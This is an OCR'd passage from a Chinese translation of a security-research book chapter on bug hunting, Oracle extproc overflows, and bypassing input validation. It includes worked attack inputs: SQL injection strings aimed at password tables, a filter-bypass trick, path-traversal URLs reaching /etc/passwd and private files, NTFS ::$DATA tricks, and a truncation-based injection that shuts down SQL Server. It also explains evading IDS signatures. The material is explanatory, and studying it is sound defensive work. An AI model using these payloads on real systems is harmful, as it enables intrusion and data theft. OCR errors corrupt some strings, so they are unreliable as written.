奇怪 的 事情 发 生 了 1! 不 是 Oracle 本 身 ， 但 显然 是 在 某 个 地 方 重 置 了 连接 ， 这 通常 表示 有 蜡 常 
发 生 。 而 且 这 个 奇怪 的 事情 还 不 是 发 生 在 Oracle 的 进程 内 。 

看 过 FileMon 的 输出 后 ， 我 们 首先 想到 extproc 是 由 TNS Listener Ctnslsnr) 进程 启动 的 ， 因 
此 决定 调试 tnslsnr 进 程 〈 在 调用 外 部 过 程 时 ， tnslsnr 是 Oracle 和 extproc 之 间 的 中 间 人 ， 用 来 
处 理 TNS 协 议 )。 我 们 在 这 里 使 用 的 调试 器 是 WinDbg， 因 为 它 可 以 民 方 便 地 跟踪 子 进程 。 整 个 调 
AEA ERI 

(1) 停止 所 有 的 Oracie 服 务 。 

(2) 启动 Oracle 数 据 库 服务 ('OracleService<hostname>' )。 

(3) 从 命令 行 执行 windbg -o tnslsnr.exe. 

这 条 命令 使 WinDbg 调 试 TNS Listener 和 TNS Listener 启 动 的 进程 。TNS Listener 正 运行 于 一 个 
交互 式 的 桌面 上 。 
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一 旦 我 们 按 顺 序 做 了 ， 就 一 定 会 在 WinDbg 里 看 到 不 可 思议 的 内 容 。 

First chance exceptions are reported before any exception handling. 
This exception may be expected and handled. 

eax-00000001 ebx=00ec0480 ecx-00010101 edx-ffffffff esi=00ebbfec 
edi=00ec04£8 

eip=41414141 esp-0012ea74 ebp=41414141 iopl-0 nv up ei pl zr na 
po nc 

cs-001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 

ef1=00010246 

41414141 ?? 22? 


这 表明 在 extproc .exe 里 存在 普通 的 栈 溢出 。 在 快速 测试 之 后 ,我们 发 现 这 个 间 题 不 止 影响 
Windows 平 台 。 

通过 使 用 create 1library 语 句 就 可 以 用 一 个 向 量 触发 这 个 错误 。 但 是 回想 David 最 初 的 
extproc 报 告 ， 我 们 想到 像 远 程 攻击 者 那样 直接 调用 extproc 是 可 能 的 。 因 此 ， 我 们 编写 一 个 程 
序 来 远程 触发 这 个 溢出 ， 发 现 它 同 样 可 以 工作 。 至 此 ， 我 们 在 Oracle 上 发 现 了 一 个 不 需 认 证 的 远 
程 栈 溢 出 漏洞 。“ 坚 不 可 摧 ” 也 不 过 如 此 ! 

很 显然 ， 这 个 漏洞 是 前 一 个 漏洞 的 补丁 引入 的 ， 这 个 功能 引入 记录 运行 外 部 过 程 的 请 求 ， 但 
它 易 受 溢出 的 影响 。 

总 结 一 下 发 现 这 两 个 bug 的 整个 过 程 。 

口 在 了 解 SQL Server 常 见 区 域 里 的 函数 有 问题 后 ,我 们 想到 这 可 能 是 体系 架构 上 的 漏洞 ， 而 

且 考 虚 到 系统 要 保证 安全 访问 存储 过 程 是 比较 困难 的 , 因此 我 们 推测 Oracle 也 可 能 有 类 似 





的 问题 。 
O 用 调试 工具 仔细 跟踪 Oracle 的 行为 之 后 发 现 , 在 没有 认证 时 有 可 能 执行 外 部 过 程 一 一 错误 
*1. 


a 再 次 用 超 长 的 函数 库 名 访问 函数 的 这 个 区 域 〈 自 第 一 个 extproc 错 误 补丁 以 后 )， 我 们 发 
现 发 生 了 一 些 奇怪 的 事情 。 
a 用 调试 器 和 文件 监视 工具 (Russinovich 和 Cogswell 发 明 的 FileMon) 确认 出 现 的 问题 。 
O 根据 对 有 问题 组 件 的 调试 ， 我 们 看 到 一 些 有 关 栈 溢出 的 异常 现象 一 一 错误 号 2. 
我 们 没有 自动 做 任何 事情 ， 只 是 把 文档 放 在 一 边 ， 仔细 查看 测试 的 系统 结构 ， 并 用 仪器 来 理 
解 系统 的 行为 。 
注意 ，Oracle 在 警报 S7 里 修补 了 这 两 个 漏洞 ， 并 详细 解释 了 其 中 的 原因 。 


19.3 ”普通 的 体系 架构 故障 

正如 我 们 在 前 面 例子 里 见 到 的 , 产生 漏洞 的 原因 是 类 似 的 。 在 过 去 的 几 年 中 ， 你 可 能 每 天 查 
看 安全 报告 ,但 从 现在 开始 ， 你 开始 注意 到 模式 ， 并 尝试 研究 它们 。 停 下 手中 的 活 并 仔细 思考 这 
些 模式 是 有 帮助 的 ， 它 们 可 能 会 为 你 今后 的 研究 提供 灵感 。 
19.3.1 ”问题 发 生 在 边界 

尽管 这 种 说 法 不 是 很 周密 但 在 做 以 下 某 种 转换 时 通常 会 产生 安全 问题 ; 从 一 个 进程 到 另 一 个 
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进程 ， 从 一 种 技术 到 另 一 种 技术 ， 或 者 从 一 个 界面 到 另 一 个 界面 。 下 面 是 一 些 例子 。 

1. 一 个 进程 调用 同一 台 主 机 上 的 外 部 进程 

与 之 相关 的 例子 是 前 面 介 绍 的 Oracle 57 号 警报 和 Andreas Junestam 发 现 的 命名 管道 劫持 的 问 
题 〈 详 见 Microsoft Bulletin MS03-031)。 为 了 看 到 有 趣 的 特权 提升 ， 你 可 以 在 Windows 里 用 
HandleEx 或 Process Explover (来 自 Sysinternals) 查看 指派 给 全 局 对 象 〈 像 共享 的 内 存 段 ) 的 权 
限 。 许 多 程序 没有 防范 本 地 攻击 。 

在 UNIX 里 ， 当 进程 为 执行 函数 而 调用 其 他 的 进程 时 ， 就 会 出 现 涉 及 分 析 命令 行 选项 的 一 系 
列 问题 。 再 强调 一 次 ， 如 果 你 正在 审计 这 一 区 域 ， 使 用 工具 会 有 所 帮助 。 在 这 个 例子 里 ， 
ltrace/strace/truss 是 最 好 的 工具 。 

2. 一 个 进程 调 入 一 个 外 部 的 、 动 态 加 载 的 函数 库 

Oracle 和 SQL Server 中 有 很 多 这 类 问题 , 其 中 包括 David Litchfield 发 现 的 extproc bug (Oracle 
警报 29) 和 多 个 SQL Server 扩 展 存储 过 程 溢出 。 

同样 ， 微 软 IIS 的 ISAPI 过 滤器 也 有 很 多 问题 ， 包 括 Commerce Server 组 件 、ISM .DLL 过 滤器 、 
SQLXML 过 滤器 、.printer ISAPI 过 滤器 等 。 尽 管 人 们 仔细 审计 了 网 络 守护 程序 的 核心 行为 ， 但 
是 却 忽视 了 延伸 性 的 问题 ， 从 而 导致 此 类 问题 发 生 。 

有 这 类 问题 的 并 不 只 是 IIS, 如 Apache mod. ss1 off-by-one bug 以 及 mod_mylo、mod_cookies、 
mod frontpage. mod ntlm. mod auth any. mod access referer. mod jk. mod_php fil 
mod_qdav 里 存在 的 问题 。 

如 果 你 审计 未 知 的 系统 ， 通 常会 在 这 种 函数 区 域 里 发 现 问题 。 

3. 一 个 进程 调 入 一 个 远程 主机 上 的 函数 

尽管 人 们 已 经 十 分 注意 这 样 的 风险 ， 但 这 仍 是 雷 区 。2007 年 出 现 的 Microsoft Windows 
RASMAN RPC bug (MS06-025) 表明 这 些 问 题 仍 没有 避免 。 其 他 的 一 些 RPC 错 误 也 属于 此 类 ， 
如 Sun UDP RPC DOS. Locator Service Yi. Dave Aitel 发 现 的 多 重 MS Exchange 洲 出 以 及 Daniel 
Jacopbowitz 发 现 的 statq 格 式 化 捉 错 误 等 。 


19.3.2 ”在 数据 转换 时 出 现 问题 

当 数 据 从 一 种 形式 转换 成 另 一 种 形式 时 ， 可 能 会 绕 过 检查 。 实 际 上 这 是 涉及 两 种 语法 规则 之 
间 转 换 的 基本 问题 。 当 你 深入 调用 树 、 创 建 一 个 系统 (可 编程 接口 在 语法 上 不 太 复杂 ) 是 格外 困 
难 的 ， 这 也 是 这 种 问题 如 此 普遍 的 原因 所 在 〈 通 常 被 称 为 公式 化 错误 )。 

在 形式 上 ， 我 们 可 以 这 样 表示 : 函数 E() 执行 一 组 行为 F。f() 通 过 把 E() 的 一 些 输入 传递 给 
函数 g ()， 调 用 g() 来 执行 这 组 行为 。g 执 行 一 组 行为 6。 但 6 包含 经 由 £() 暴露 的 不 受 欢迎 的 行为 ， 
我 们 把 这 些 坏 行 为 称 为 GbaG。 因 此 ，f() 必须 确保 G 没 有 包含 Gbad。f() 实现 这 个 机 制 的 唯一 方法 
是 全 面 理 解 G、 验 证 f() 的 输入 ， 确 保 在 bad 的 任何 成 员 里 没有 产生 输入 组 合 。 

这 是 一 个 问题 ， 原 因 有 两 点 。 

a 当 你 沿 着 这 个 调用 树 向 下 走 ， 事 情 遂 常 变 得 更 复杂 ， 于 是 £() 要 处 理 非常 多 的 情况 。 

a 沿 着 调用 树 往 下 走时 ，g ()、h()、i()、j () 等 面临 同样 的 问题 。 
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例如 ， 为 了 获取 Win32 文 件 系统 函数 ， 可 能 会 有 一 个 程序 接受 文件 名 。 就 该 程序 能 理解 的 文 
件 名 概念 而 言 ， 它 假设 可 能 存在 如 下 的 情形 。 

a 文件 名 的 结尾 可 能 带 扩 展 名 。 扩 展 名 一 般 是 3 个 字符 ， 用 名 点 CO 和 文件 名 隔 开 。 

文件 名 可 能 是 绝对 路 径 ， 假 如 这 样 的 话 ， 它 由 驱动 器 符 开始 ， 紧 接着 是 冒号 (0. 

O 文件 名 可 能 是 相对 路 径 。 假 如 这 样 的 话 ， 它 将 包含 反射 杠 (CO. 

D 每 个 反 斜 杠 表示 进入 一 个 子 目 录 。 

就 这 个 程序 而 言 , 这 些 可 以 作为 构成 文件 名 的 语法 。 但 是 , 基本 文件 系统 函数 ( 像 Win32 API 
CreateFile) 实现 的 语法 包含 了 许多 潜在 危险 的 构造 ， 如 下 所 示 〔 不 详尽 )。 

O 文件 名 可 能 以 双 斜 杠 开 始 。 如 果 是 这 种 情形 ， 第 一 个 directory name 表 示 网 络 主机 ， 第 

二 个 表示 SMB share name。FileSsystemApbI 将 试 着 用 当前 用 户 的 证 书 〈 和 凭证 ) (可 找到 ) 


连接 这 个 共享 。 
a 文件 名 也 可 能 以 \\?\ 开 始 , 表示 是 Unicode 文 件 路 径 , 可 以 超出 FileSystemAPI 强 加 的 长 
度 限 制 。 


a 文件 名 也 能 以 \\?\uNC 开 始 ， 也 将 触发 如 上 描述 的 微软 共享 连接 行为 。 

O 文件 名 也 能 以 \\.\PHYSICALDRIVE<n> 开 始 ，<n> 是 要 打开 的 、 从 零 开 始 计 数 的 、 物 理 驱 
动 器 的 索引 号 。 这 将 为 原始 的 访问 打开 物理 驱动 器 。 

O 文件 名 也 能 以 \\.\\pipe\<pipename> 开 始 。 将 打开 命名 管道 <pipename>。 

a 文件 名 也 可 以 包括 冒号 (:)( 在 最 初 的 驱动 器 符 之 后 )}。 这 表示 NTFS 文 件 系 统 里 交替 的 
(alternate) 数据 流 ， 它 可 以 作为 明显 的 文件 进行 有 效 处 理 ， 但 和 目录 里 列 出 来 的 完全 不 
一 样 。 系 统 为 正常 的 文件 内 容 保留 :$DATA 文 件 流 。 

a 文件 名 可 以 包括 (作为 目录 名 )“..” 或 “.” 序 列 。 前 一 种 情况 表示 转 到 父 月 录 ， 后 一 种 

情况 表示 保持 原 目 录 不 变 。 

可 能 还 有 很 多 奇怪 的 行为 。 这 主要 是 因为 底层 API 可 能 执行 了 意料 之 外 的 操作 ， 只 有 仔细 地 
验证 输入 ， 才 有 可 能 防止 引入 问题 。 因 此 ， 从 攻击 者 的 角度 来 看 ， 必 须 理 解 这 些 潜在 的 行为 ， 并 
尝试 绕 过 防御 性 的 输入 验证 措施 来 攻击 系统 。 

因为 这 种 原因 (但 不 是 所 有 的 shellcode〉 而 导致 的 bug 有 IIS Unicode bug、JIS 两 次 解码 bug、 
CDONTS.NewMail SMTP 注 入 问题 、PHP 的 http://filename 行 为 (能 通过 URL 打 开 文 件 ) 和 
Macromedia Apache 源 码 漆 露 漏洞 (在 URL 结 尾 加 上 一 个 编码 过 的 空格 就 可 以 得 到 源码 ) SE. JL 
乎 每 一 个 源码 泄露 错误 都 可 以 归 为 输入 验证 错误 。 

仔细 想 一 下 , 淤 出 会 带 来 如 此 多 的 危害 的 真正 原因 就 是 输入 验证 。 提交 给 函数 的 输入 在 的 上 
下 文 里 被 解释 了 。 在 栈 溢出 例子 里 ， 溢 出 缓冲 区 的 数据 作为 栈 帧 组 成 数据 的 一 部 分 被 处 理 ， 如 
VPTR (Virtual PoinTeR， 虚 拟 指 针 )、 保 存 的 返回 地 址 、 异 常 处 理 程序 的 地 址 等 。 同 一 短语 在 不 
同 的 场合 会 被 解释 成 不 同 的 含义 。 

几乎 所 有 的 攻击 都 试图 构造 在 多 重 语法 里 有 效 的 短语 。 在 信息 理论 和 编码 理论 的 领域 内 ,对 
此 有 一 些 有 趣 的 防御 性 的 暗示， 因为 如 果 你 可 以 保证 两 个 语法 之 间 没 有 共同 的 短语 ， 那 么 就 可 以 
确保 不 可 能 通过 基于 两 者 之 间 的 转换 来 进行 攻击 。 
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解释 性 的 上 下 文 有 些 用 处 , 特别 是 如 果 你 正在 处 理 一 个 支持 多 种 网 络 协议 的 目标 时 , 例如 用 
神秘 的 XML 格 式 向 提供 Web 服 务 的 服务 器 发 送 E-mail 和 转换 数据 的 Web 服 务 器 。 如 果 你 能 正确 地 
回答 “用 什么 解析 输入 ” 你 寻找 bug 的 方法 就 应 该 是 正确 的 了 。 

19.3.3 ”不 对 称 区 域 里 的 问题 

开发 者 通常 倾向 于 采用 整体 防御 技术 ， 比 如 说 ， 把 长 度 限 制 、 检 查 格式 化 串 和 其 他 的 输入 验 
证 综合 起 来 使 用 。 在 这 种 情形 下 ， 我 们 要 想 找 出 问题 所 在 ， 最 好 是 查找 不 对 称 区 域 ， 仔 细 研 究 到 
底 是 什么 原因 导致 了 这 种 不 对 称 产生 。 

Web 服 务 器 支持 的 单一 HTTP 头 相 比 其 他 的 头 可 能 会 有 不 同 的 长 度 限制 .如 果 输 入 数据 里 有 一 
个 特别 的 符号 ， 可 能 会 产生 一 个 奇怪 的 响应 。Apache 里 指定 了 一 个 最 近 才 实 现 的 Web 方 法 ， 它 似 
平 改变 了 错误 消息 。 当 请 求 cmd.exe 时 , 通过 有 问题 的 Web 服 务 器 执行 文件 的 企图 或 许 会 失败 , 但 
请 求 ftp.exe 会 成 功 。 

注意 不 同 的 区 域 可 以 提示 你 注意 保护 措施 较 弱 的 产品 区 域 。 

19.3.4” 当 认证 和 授权 混淆 的 时 候 出 现 问 题 

认证 是 验证 身份 的 过 程 ， 而 授权 是 系统 决定 合法 用 户 可 以 使 用 给 定 资源 的 过 程 。 

很 多 系统 十 分 重视 前 者 ， 并 想当然 地 假设 前 者 没 问题 ， 后 者 就 不 会 有 问题 。 更 糟糕 地 是 ， 有 
时 候 两 者 之 间 并 没什么 关联 ， 如 果 你 能 找到 另外 可 以 访问 数据 的 路 径 ， 你 就 能 访问 它 〈 而 不 需要 
什么 “认证 ”)。 这 可 能 导致 特权 提升 ， 如 Oracle extproc， 还 有 一 些 其 他 的 例子 ， 比 如 说 ，Lotus 
Domino 里 的 view ACL bypass bug (www.ngssoftware.com/advisories/viewbypass.txt ) Oracle 
mod_plsql 里 的 绕 过 认证 错误 (www.ngssoftware.com/papers/hpoas.pdf ， 搜 索 authentication 
by-pass ) 。 Apache 的 不 区 分 大 小 写 的 htaccess 漏 洞 C www.omnigroup.com/mailman/archive/ 
macosx-admin/2001-June/020678.html) 是 另 一 个 十 分 典型 的 例子 。 它 们 说 明 ， 只 要 敏感 数据 存在 
其 他 的 访问 路 径 ， 什 么 都 有 可 能 发 生 。 

在 很 多 Web 程 序 里 也 可 以 看 到 类 似 的 问题 。 因 为 Hrrp 是 无 状态 协议 , 所 以 它们 一 般 通过 维护 
状态 的 机 制 〈 会 话 ID) 来 保存 认证 状态 ， 因 此 ， 如 果 你 能 以 某 种 方式 猜测 或 复制 会 话 ID， 就 能 跳 
19.3.5 在 最 显眼 的 地 方 存在 的 问题 

如 果 寻 找 pug 纯 属 技术 问题 ， 需 要 花 上 一 整 天 ， 还 不 如 先 搜索 一 些 明显 的 错误 。 超 长 用 户 名 
就 属于 这 类 错误 : 

QO www.ngssoftware.com/advisories/sambar.txt 
Q otn.oracle.com/deploy/security/pdf/2003Alert58.pdf 


OD www.ngssoftware.com/advisories/ora-unauthrm. txt 











ü www.ngssoftware.com/advisories/ora-isqlplus.txt 
O www.ngssoftware.com/advisories/steel-arrow-bo. txt 


Q cve.mitre.org/cgi-bin/cvename.cgi?name-CAN-2002-0891 
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QO www.kb.cert.org/vuls/id/322540 

通常 情况 下 ,如 果 你 在 认证 之 前 就 能 获得 系统 的 控制 权 , 那么 在 攻击 服务 器 时 就 不 需要 用 户 
名 和 密码 了 ， 因 此 ， 在 研究 溢出 和 格式 化 串 时 ， 协 议 的 认证 阶段 是 很 好 的 目标 。 两 个 典型 的 未 认 
证 远程 root bug 是 Dave Aitel 发 现 的 hello bug (cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002- 
1123) 和 David Litchfield 发 现 的 SQL-UDP bug (www.ngssoftware.com/advisories/mssql-udp.txt)。 
我 们 还 发 现 某 些 包含 各 种 星 涩 协议 的 产品 在 不 需要 认证 的 情况 下 也 可 以 被 访问 ， 在 一 些 情形 下 ， 
认证 检查 可 以 很 简单 地 跳 过 去 。 在 一 个 给 我 留 下 深刻 印象 的 例子 里 ,协议 在 缺乏 认证 状态 时 想 当 
然 地 认为 用 户 是 超级 用 户 (“如 果 没 有 vid 则 uid 为 0” 且 “uid 为 0 则 你 是 根 用 户 ”)。 这 些 地 方 显 而 
易 见 是 极 有 可 能 发 现 漏洞 的 。 


19.4” 绕 过 输入 验证 和 攻击 检测 


理解 目标 系统 的 输入 验证 机 制 并 知道 怎样 绕 过 它 是 bug 猫 人 必须 具备 的 技能 。 我 们 将 大 概 介 
绍 一 下 这 个 问题 ， 以 帮助 你 理解 错误 在 哪儿 产生 ， 并 为 你 提供 一 些 绕 过 验证 的 方法 。 


19.4.1 剥离 坏 数 据 

程序 员 一 般 会 通过 正则 表达 式 来 限制 (或 检测 ) 潜在 的 攻击 。 正 则 表达 式 一 般 用 来 剥离 输入 
数据 中 已 知 的 坏 数据 ;如果 你 准备 预防 SQL 注入 攻击 ， 你 可 能 会 写 一 个 剥离 SQL 保留 关键 字 〈 如 
select. union. where. from) 的 过 滤器 。 

如 果 我 们 输入 

' union select name, password from sys.user$-- 

经 过 过 滤器 处 理 后 ， 可 能 会 变 成 

' name, password sys.user$-- 

这 不 是 我 们 想 要 的 。 针 对 不 同 的 过 滤器 ， 绕 过 的 方法 也 不 一 样 ， 在 这 个 例子 里 ， 我 们 可 以 通 
过 重复 坏 数 据 来 绕 过 限制 ， 如 下 : 

’ uniunionon selselectect name, password frfromom sys.user$-- 

在 每 个 坏 短 语 里 都 包含 自身 的 一 个 副本 。 剥 离 后 , 坏 短语 被 过 滤 了 , 剩 下 的 正好 是 我 们 想 要 
的 结果 。 很 明显 ， 这 个 方法 仅 在 坏 短 语 由 两 个 不 同 的 字符 组 成 时 才 有 效 。 


19.4.2 ”使 用 交替 编码 

绕 过 输入 验证 最 常见 的 方法 是 对 数据 进行 交替 编码 。 例 如 ， 你 可 能 发 现 Web 服务 器 或 Web 
应 用 程序 会 根据 数据 的 编码 方式 进行 相应 的 处 理 。IIS Unicode 编 码 区 分 符 (specifier) su 就 是 典 
型 的 例子 。 在 IIS 里 ， 下 面 两 个 URL 是 相等 的 : 

口 www.example.com/%c0%af 

Q www.example.com/%uc0af 

另 一 个 典型 的 例子 是 对 空格 的 处 理 。 你 可 能 会 发 现 程序 经 常 把 空格 当 作 分 隔 符 而 不 是 TAB、 
回 车 或 换行 。 在 Oracle Tz_oFFSET 溢 出 里 ， 空 格 终止 timezone 区 分 符 ， 但 TAB 不 会 。 我 们 曾经 为 
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这 个 溢出 写 过 攻击 代码 ， 但 是 当 我 们 想 在 攻击 代码 里 运行 带 参 数 的 命令 时 却 碰 到 了 麻烦 ， 后 来 ， 
我 们 把 命令 行 里 的 空格 换 成 了 TAB， 攻 击 代码 运行 得 很 好 ， 这 主要 是 因为 绝 大 多 数 的 shell 把 空格 
和 TAB 作 为 分 隔 符 ?。 

另 一 个 比较 典型 的 例子 是 TSAPIT 过 滤器 ， 它 试图 用 证 书 〈 赁 证 ) 限制 对 IIS 虚拟 目录 的 访问 。 
如 果 你 没有 通过 认证 而 请 求 /downloads 目录 里 的 数据 (o www.example.com/downloads/ 
hot new file.zip)， 过 滤器 就 会 生效 。 很 显然 ， 为 了 绕 过 这 个 限制 ， 我 们 可 以 尝试 : 

www.example.com/Downloads/hot_new_file.zip 

这 不 工作 ? 试 试 这 个 ， 

www. example.com/%64ownloads/hot_new_file.zip 


OK! 过 滤器 被 绕 过 了 。 现 在 不 用 认证 就 可 以 访问 downloads 目 录 了 ! 


19.4.3 ”使 用 文件 处 理 特征 

这 节 提 到 的 方法 仅 适 合 于 Windows， 但 在 UNIX 平台 上 ， 你 也 能 发 现 类 似 的 方法 。 只 要 符合 
以 下 任 一 条 ， 就 可 以 用 这 样 的 方法 欺骗 任意 应 用 程序 。 

口 它 相 信 请 求 的 字符 串 出 现在 文件 路 径 里 。 

a 它 相信 禁止 的 字符 串 没有 出 现在 文件 路 径 里 。 

口 如 果 文 件 处 理 是 基于 文件 的 扩展 名 的 ， 它 对 文件 应 用 错误 的 行为 。 

1. 请 求 的 字符 串 出 现在 路 径 里 

第 一 种 情况 很 容易 应 付 。 在 绝 大 多 数 情况 下 ,只 要 可 以 提交 文件 名 ,就 可 以 提交 目录 名 。 在 
以 前 的 一 个 案例 里 ,我 们 直到 这 样 的 情形 :只 要 文件 位 于 给 定 的 清单 里 Web 应 用 程序 脚本 就 提供 
这 些 文件 。 通 过 确保 出 现在 file-path 参 数 里 的 字符 串 是 下 列 指定 的 文件 名 之 一 来 实现 : 

Q data/foo.xls 

Q data/bar.xls 

D data/wibble.xls 

Q data/wobble.xls 
典型 的 请 求 如 下 : 

www.example.com/getfile?file path-data/foo.xls 

令 人 感 兴趣 的 是 , 大 多 数 文件 系统 在 碰 到 父 路 径 时 , 并 不 会 去 验证 所 有 的 引用 目录 是 否 存在 。 
因此 ， 如 果 我 们 提交 如 下 请 求 ， 就 能 绕 过 验证 : 

www.example.com/getfile?file path-data/foo.xls/../:./../etc/passwd 

2. 禁止 的 字符 串 不 出 现在 路 径 里 

这 种 情形 有 点 麻烦 ， 而 且 它 还 包括 目录 。 我 们 假设 上 节 提 到 的 脚本 允许 我 们 访问 任何 文件 ， 
但 禁止 使 用 父 路 径 (/../)， 并 且 通 过 检查 file-path 参 数 里 的 字符 串 是 否 和 下 面 匹 配 来 从 根本 上 
限制 我 们 访问 私有 数据 目录 : 


(D 在 Oracle TZ_OFFSET 溢 出 的 例子 里 ， 程 序 只 把 TAB 作 为 分 隔 符 。 一 一 译 者 注 
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data/private 

我 们 可 以 提交 如 下 请 求 绕 过 这 个 保护 机 制 : 

www.example.com/getfile?file path-data/./private/accounts.xls 
因为 路 径 里 的 /. /什么 也 没 做 。 用 双 斜 枉 〈'aata//private') 有 时 候 也 能 绕 过 这 个 保护 机 制 。 

3. 基于 文件 扩展 名 的 不 正确 行为 

假设 Web 站 点 管理 员 非 常 讨厌 人 们 下 载 他 们 的 账号 文件 《Excel 格式 )， 决 定 通过 过 滤器 禁止 
访问 以 ,xls 结尾 的 任何 file_path 参 数 。 这 时 ， 我 们 可 以 尝试 : 

www.example.com/getfile?file path=data/foo.xls/../private/accounts.xls 

失败 了 ， 再 尝试 : 

www.example.com/getfile?file path=data/./private/accounts.xls 

又 失败 了 。 

Windows NT NTFS 最 有 意思 的 特性 之 一 是 ， 它 的 文件 支持 交替 的 〈alternate) 数据 流 ， 可 以 
用 文件 名 后 加 上 冒号 〈:7， 再 跟 上 流 名 称 〈stream name) 来 表示 。 

我 们 可 以 利用 这 个 特性 得 到 账号 文件 。 只 需要 请 求 : 

www.example.com/getfile?file path-data/./private/accounts.xls::$DATA 
Web 服 务 器 就 会 返回 账号 文件 的 数据 。 产 生 这 个 结果 的 原因 是 文件 “默认 的 ”数据 流 是 : : SDATA. 
因此 ， 虽 然 我 们 请 求 的 是 同一 数据 ， 但 文件 名 不 以 .xls 结 尾 ， 脚 本 就 允许 我 们 访问 这 个 文件 。 

为 了 亲自 体验 一 下 ， 在 NT 上 运行 (在 NTFS 里 );: 

echo foobar > foo.txt 

然后 运行 : 

more < foo.txt::SDATA 
你 将 看 到 foobar。 这 个 技术 除了 混淆 输入 验证 之 外 ， 也 为 隐藏 数据 提供 了 好 方法 。 

前 些 年 在 ITS 里 出 现 了 这 样 的 bug， 通 过 提交 如 下 请 求 就 可 以 阅读 ASP 页 面 的 源码 ， 

www.example.com/foo.asp:::SDATA 

这 也 是 基于 文件 扩展 名 的 不 正确 行为 所 致 。 

在 Windows 系 统 里 ， 另 一 个 与 文件 扩展 名 有 关 的 技巧 是 在 扩展 名 后 加 一 个 或 多 个 句点 。 这 样 
一 来 ， 我 们 的 请 求 看 起 来 像 下 面 这 样 : 

www.example.com/getfile?file path-data/./private/accounts.xls. 

程序 有 时候 会 认为 扩展 名 为 空 ， 而 有 时 候 会 认为 是 ,xls。 你 也 会 因此 得 到 同样 的 数据 。 可 
以 用 如 下 命令 来 验证 : 

echo foobar > foo.txt 
然后 运行 

type foo.txt. 
或 者 


notepad foo.txt..... 
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19.4.4 ” 避 开 攻击 特征 

大 部 分 IDS 根 据 特征 来 识别 攻击 行为 。 在 shellcode 的 领域 内 ， 人 们 公布 了 很 多 与 nop 等 价 指令 
有 关 的 信息 ， 但 这 里 ， 我 们 还 是 要 再 简单 介绍 一 下 ， 因 为 它 实 在 是 太 重 要 了 。 

我 们 在 写 shellcode 的 时 候 , 在 有 意义 的 指令 之 间 ， 几乎 可 以 插入 任意 指令 ,对 shellcode 来 说 ， 
这 些 指 令 什 么 也 不 做 。 需 着 重 记 住 的 是 , 这 些 指 令 真 的 不 用 做 什么 一 一 它们 不 必 进 行 任何 与 破解 
相关 的 操作 。 例 如 ， 在 写 shellcode 时 ， 你 可 以 在 真正 的 指令 之 间 交 叉 插入 一 系列 复杂 的 栈 帧 操作 
(manipulation) 来 拼凑 破解 。 

对 于 一 个 给 定 的 shellcode， 我 们 几乎 可 以 用 无 限 种 方法 改写 它 ， 例 如 ， 把 参数 压 入 栈 或 者 把 
它们 复制 到 寄存 器 。 我 们 可 以 很 容易 地 写 一 个 接受 汇编 形式 的 攻击 代码 ， 并 生成 功能 相同 而 代码 
序列 不 同 的 攻击 代码 的 生成 器 。 


19.4.5 ”击败 长 度 限制 

在 某 些 情况 下 ， 程 序 会 把 参数 截 成 固定 的 长 度 。 这 样 做 的 原因 通常 是 为 了 预防 缓冲 区 溢出 ， 
但 Web 程 序 有 时 候 把 它 作为 普通 的 防御 机 制 来 防止 SQL 注入 攻击 或 执行 命令 。 在 这 种 情况 下 ， 有 
多 种 方法 可 以 冲破 这 种 限制 。 

1. 海 猴 ?数据 

你 可 以 根据 数据 的 性 质 , 将 数据 进行 适当 的 扩展 后 再 提交 给 目标 程序 。 比 如 说 ,在 大 多 数 基 
于 Web 的 应 用 程序 中 ， 你 可 以 把 双 引 号 编码 成 : 

&quot; 

这 是 将 1 个 字符 扩展 为 6 个 字符 。 

任何 在 输入 里 的 有 可 能 被 “ 转 义 ”的 字符 都 适合 进行 扩展 ， 如 单 引号 、 反 斜 杜 、 管 道 符号 和 
美元 符号 。 

如 果 可 以 提交 UTF-8 序 列 ， 那 应 该 也 可 以 提交 超 长 的 序列 ， 因 为 系统 可 能 把 它们 作为 单一 字 
符 来 处 理 。 如 果 碰 到 一 个 把 所 有 非 ACSII 字 符 当 作 16 位 UTF-8 来 处 理 的 程序 ， 那 么 你 很 幸运 ， 
为 你 提交 的 字符 串 可 以 比 它 允 许 的 更 长 ， 从 而 使 它 产生 溢出 ， 当 然 ， 这 还 要 看 它 是 怎样 计算 字符 
串 长 度 的 。 

$2edÉ CO 的 URL 编 码 。 而 


%£0%80%80%ae 
和 


$fc$80980*$80$80$ae 


EE O 的 编码 。 
2. 有 害 的 严重 截断 转 义 字符 
这 种 技术 最 常见 的 应 用 是 SQL 注入 ， 尽 管 很 早 就 有 过 正式 的 讨论 , 但 在 使 用 分 隔 或 转 义 数据 


(QD 海 猴 (sea monkey)， 又 名 丰年 虫 ， 具 有 很 强 的 繁殖 能 力 。 这 是 引申 为 数据 的 扩展 性 。 一 一 译 者 注 
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的 地 方 ， 还 是 有 可 能 找到 应 用 这 种 技术 的 各 种 各 样 的 方法 。 在 Perl 里 运行 命令 可 能 更 适 于 注入 
SMTP 流 。 

实际 上 ， 如果 数据 被 转 义 和 截断 ， 在 某 些 时 候 ， 你 可 以 从 转 义 序列 的 中 间 进 行 截断 ， 以 此 来 
摆脱 分 隔 区 域 。 

看 一 个 明显 的 SQL 注入 例子 : 如 果 程 序 通过 用 两 个 单 引号 转 义 单 引 号 来 接收 用 户 名 和 密码 ， 
《假设 ) 用 户 名 的 长 度 被 限制 为 16 个 字符 ， 密 码 也 被 限制 为 16 个 字符 ， 那 么 下 面 的 用 户 名 /密码 组 
合 将 执行 shutdown 命 令 ， 从 而 关闭 SQL Server: 


Username: aaaaaaaaaaaaaaa' 
Password: ' shutdown 


程序 试图 转 义 用 户 名 结尾 的 单 引 号 ， 但 那 时 这 个 字符 串 被 切 成 16 个 字符 ， 删 除了 “ 转 义 ” 单 
引号 。 结 果 导 致密 码 字 段 可 以 包含 以 单 引 号 开始 的 SQL 语句 。 这 个 查询 可 能 像 下 面 这 样 : 
Select * from users Where username-'aaaaaaaaaaaaaaa'' and password-''' 


Shutdown 

而 实际 上 ， 查 询 里 的 用 户 名 变 成 了 : 

aaaaaaaaaaaaaaa' and password=' 

于 是 后 面 的 SQL 命令 被 执行 ，SQL ServerXH]. 

这 个 方法 通常 可 以 用 于 限制 了 长 度 但 又 包含 了 转 义 序列 的 数据 。 在 perl 里 ， 有 一 些 明显 采用 
这 个 技术 的 应 用 程序 ， 因 为 perl 的 应 用 程序 倾向 于 召集 扩展 的 脚本 。 

3. 多 次 尝试 

